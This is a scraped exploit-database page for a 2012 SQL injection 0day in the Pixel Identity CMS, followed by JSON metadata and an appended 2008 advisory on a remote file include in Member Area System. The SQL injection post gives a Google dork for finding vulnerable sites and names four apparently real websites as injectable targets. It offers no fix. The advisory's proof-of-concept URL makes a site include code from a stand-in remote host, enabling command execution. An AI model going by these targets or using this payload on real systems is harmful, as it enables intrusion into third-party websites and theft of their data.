Search...

Pixel Identity - SQL Injection Vulnerability

2012-06-27T00:00:00

ID 1337DAY-ID-18844
Type zdt
Reporter Taurus Omar
Modified 2012-06-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ &gt;&gt; Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
| C _:_ A |    Pixel Identity - SQL Injection Vulnerability    | C _:_ A |
--------------------------------------------------------------------------

==&gt; ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org 
--- omar-taurus[at]live[dot]com
 
===&gt; INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day 
Title Exploit : Pixel Identity - SQL Injection Vulnerability 
Vendor        : Pixel Identity
URL Vendor    : http://www.pixel-identity.com/
Google Dork   : intext:"Powered By Pixel Identity."
0day exploits : 1337day.com Inj3ct0r Exploit DataBase 

==&gt; SAMPLE'S SQLi:
http://www.karltravelsl.com/web/main.php?view=get_page&idpage=5 [SQL Injection]
http://www.techtrade.com.lb/web/main.php?view=get_tcategory&idcat=2 [SQL Injection]
http://www.svelteliving.com/web/main.php?view=get_shownews&idpage=82 [SQL Injection]
http://www.urbanagriculture-mena.org/web/main.php?view=get_news&idsnews=9 [SQL Injection]

MORE IN GOOGLE..




#  0day.today [2018-03-17]  #

JSON Vulners Source

Initial Source

{"hash": "0dd7778f3ed5ce6abd095a591cf53dcb12eee94d2d3e2123b95da67ca0f48f6f", "id": "1337DAY-ID-18844", "lastseen": "2018-03-17T03:14:38", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b84fba91399ba551c342686854504f29", "key": "href"}, {"hash": "a33b99e2ff726777f1ac2168d9dd88bb", "key": "modified"}, {"hash": "a33b99e2ff726777f1ac2168d9dd88bb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9288a9de525593c10c50ba5b85ed205f", "key": "reporter"}, {"hash": "45fc326808375a7bd689da694621574a", "key": "sourceData"}, {"hash": "e4ae28f79f0cd95ba1df773f3c3208cd", "key": "sourceHref"}, {"hash": "5884547bae3f19051a7ac2358ac9876f", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-03-17T03:14:38"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18844"]}], "modified": "2018-03-17T03:14:38"}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18844", "description": "Exploit for php platform in category web applications", "title": "Pixel Identity - SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "7036aee79bd477c7b9d7ea598236a2e9d1c15f4c232100735674a87157e1fadc", "id": "1337DAY-ID-18844", "lastseen": "2016-04-19T02:16:11", "enchantments": {"score": {"value": 7.3, "modified": "2016-04-19T02:16:11"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5971cb1358aa90aa3642b58bfb394a41", "key": "sourceHref"}, {"hash": "a33b99e2ff726777f1ac2168d9dd88bb", "key": "published"}, {"hash": "a33b99e2ff726777f1ac2168d9dd88bb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5884547bae3f19051a7ac2358ac9876f", "key": "title"}, {"hash": "163a99bbcf38b20924a001f0ef7627df", "key": "href"}, {"hash": "9288a9de525593c10c50ba5b85ed205f", "key": "reporter"}, {"hash": "22a65f41d2377cc9d6305f06ea0addfc", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18844", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Pixel Identity - SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [x] Official Website: http://www.1337day.com 0\r\n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n0 0\r\n1 ========================================== 1\r\n0 I'm Taurus Omar Member From Inj3ct0r TEAM 1\r\n1 ========================================== 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n| |\r\n| C _:_ A | Pixel Identity - SQL Injection Vulnerability | C _:_ A |\r\n--------------------------------------------------------------------------\r\n\r\n==> ABOUT ME:\r\n--- TAURUS OMAR\r\n--- INDEPENDENT SECURITY RESEARCHER\r\n--- ACCESOILEGAL.BLOGSPOT.COM\r\n--- @omartaurus\r\n--- omar-taurus[at]dragonsecurity[dot]org \r\n--- omar-taurus[at]live[dot]com\r\n \r\n===> INFO:\r\nAuthor : TAURUS OMAR\r\nCategory : Webapps / 0day \r\nTitle Exploit : Pixel Identity - SQL Injection Vulnerability \r\nVendor : Pixel Identity\r\nURL Vendor : http://www.pixel-identity.com/\r\nGoogle Dork : intext:\"Powered By Pixel Identity.\"\r\n0day exploits : 1337day.com Inj3ct0r Exploit DataBase \r\n\r\n==> SAMPLE'S SQLi:\r\nhttp://www.karltravelsl.com/web/main.php?view=get_page&idpage=5 [SQL Injection]\r\nhttp://www.techtrade.com.lb/web/main.php?view=get_tcategory&idcat=2 [SQL Injection]\r\nhttp://www.svelteliving.com/web/main.php?view=get_shownews&idpage=82 [SQL Injection]\r\nhttp://www.urbanagriculture-mena.org/web/main.php?view=get_news&idsnews=9 [SQL Injection]\r\n\r\nMORE IN GOOGLE..\r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2012-06-27T00:00:00", "references": [], "reporter": "Taurus Omar", "modified": "2012-06-27T00:00:00", "href": "http://0day.today/exploit/description/18844"}, "lastseen": "2016-04-19T02:16:11", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [x] Official Website: http://www.1337day.com 0\r\n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n0 0\r\n1 ========================================== 1\r\n0 I'm Taurus Omar Member From Inj3ct0r TEAM 1\r\n1 ========================================== 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n| |\r\n| C _:_ A | Pixel Identity - SQL Injection Vulnerability | C _:_ A |\r\n--------------------------------------------------------------------------\r\n\r\n==> ABOUT ME:\r\n--- TAURUS OMAR\r\n--- INDEPENDENT SECURITY RESEARCHER\r\n--- ACCESOILEGAL.BLOGSPOT.COM\r\n--- @omartaurus\r\n--- omar-taurus[at]dragonsecurity[dot]org \r\n--- omar-taurus[at]live[dot]com\r\n \r\n===> INFO:\r\nAuthor : TAURUS OMAR\r\nCategory : Webapps / 0day \r\nTitle Exploit : Pixel Identity - SQL Injection Vulnerability \r\nVendor : Pixel Identity\r\nURL Vendor : http://www.pixel-identity.com/\r\nGoogle Dork : intext:\"Powered By Pixel Identity.\"\r\n0day exploits : 1337day.com Inj3ct0r Exploit DataBase \r\n\r\n==> SAMPLE'S SQLi:\r\nhttp://www.karltravelsl.com/web/main.php?view=get_page&idpage=5 [SQL Injection]\r\nhttp://www.techtrade.com.lb/web/main.php?view=get_tcategory&idcat=2 [SQL Injection]\r\nhttp://www.svelteliving.com/web/main.php?view=get_shownews&idpage=82 [SQL Injection]\r\nhttp://www.urbanagriculture-mena.org/web/main.php?view=get_news&idsnews=9 [SQL Injection]\r\n\r\nMORE IN GOOGLE..\r\n\r\n\r\n\n\n# 0day.today [2018-03-17] #", "published": "2012-06-27T00:00:00", "references": [], "reporter": "Taurus Omar", "modified": "2012-06-27T00:00:00", "href": "https://0day.today/exploit/description/18844"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "----------------------------------------------------------------------\r\n\r\nMember Area System (MAS) Remote File Include Vulnerability (view_func.php)\r\n\r\n----------------------------------------------------------------------\r\n\r\nAuthor: ShipNX <ship_nx [AT] yahoo com>\r\nImpact: Remote file include\r\nStatus: Patch not available\r\n\r\n----------------------------------------------------------------------\r\n\r\nSoftware description:\r\n\r\nName: Member Area System (MAS)\r\nVersion: Vendor does not disclose version information since v1.7.\r\nProbably later versions are also vulnerable\r\nVendor: Mansion Productions\r\nVendor homepage: http://www.mansionproductions.com/\r\nSoftware homepage: http://www.mansionproductions.com/mas/\r\n\r\nDescription:\r\nMAS is a leading content management system (CMS) specially designed \r\nfor adult-oriented sites managements. It is used on many major adult\r\nsites around the world.\r\n\r\n----------------------------------------------------------------------\r\n\r\nVulnerability:\r\n\r\nCode: view_func.php\r\n\r\n...\r\n$path=dirname($i).'/';\r\ninclude($path.$l.'/'.'filelist.mas');\r\n...\r\n\r\nThe variables $i and $l are not properly sanitized\r\nbefore using them in include() construction. \r\nIf Register Globals = On and Allow URL Include (Allow URL Fopen) = On\r\nthen an attacker can send the malicious request leading to remote\r\nfile include and therefore arbitrary command execution.\r\n\r\n---------------------------------------------------------------------\r\n\r\nPOC:\r\n\r\nConditions:\r\nRegister Globals = On\r\nAllow URL fopen (Allow URL include since PHP 5.2.0) = On\r\n\r\nhttp://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?\r\n\r\nNote: \r\n\r\njustsomedir/ is required here as data passed via $i first gets sent to dirname() function\r\nwhich will product\r\n\r\n$path='http://remotesite.com/';\r\n\r\nThe remote file should be placed at http://remotesite.com/testfile.txt\r\n\r\n----------------------------------------------------------------------\r\n\r\nWorkaround:\r\n\r\nThe vendor is aware of the vuln for ages (probably since 2006) so they\r\nrecommend setting up Register Globals = Off. Not sure why they haven't\r\npatched the vuln already. If Register Globals is Off on your server, then\r\nyou are more or less secure. If it is On, ask your system administrator\r\nto turn it Off. If for some reason you need Register Globals = On on your\r\nsite (using old software etc), then contact the vendor and MAYBE they will\r\nfinally patch the bug :-)\r\n\r\n----------------------------------------------------------------------\r\n\r\nHistory:\r\n\r\nVuln found: Late 2005 :-))\r\nVendor notified: Seems like the vendor knows of the vuln since 2006, but\r\nfor some reason fails to patch the vuln. Maybe they just want it to keep\r\nquiet, or maybe the security matters just don't bother them - not sure. \r\nAnyway, maybe this advisory will finally force them to do patching :-))\r\nAdvisory: 11/01/2008\r\n\r\n----------------------------------------------------------------------\r\n\r\nThanks to:\r\n\r\nDeZender creators :-)", "modified": "2008-01-12T00:00:00", "published": "2008-01-12T00:00:00", "id": "SECURITYVULNS:DOC:18844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18844", "title": "Member Area System (MAS) Remote File Include Vulnerability (view_func.php)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}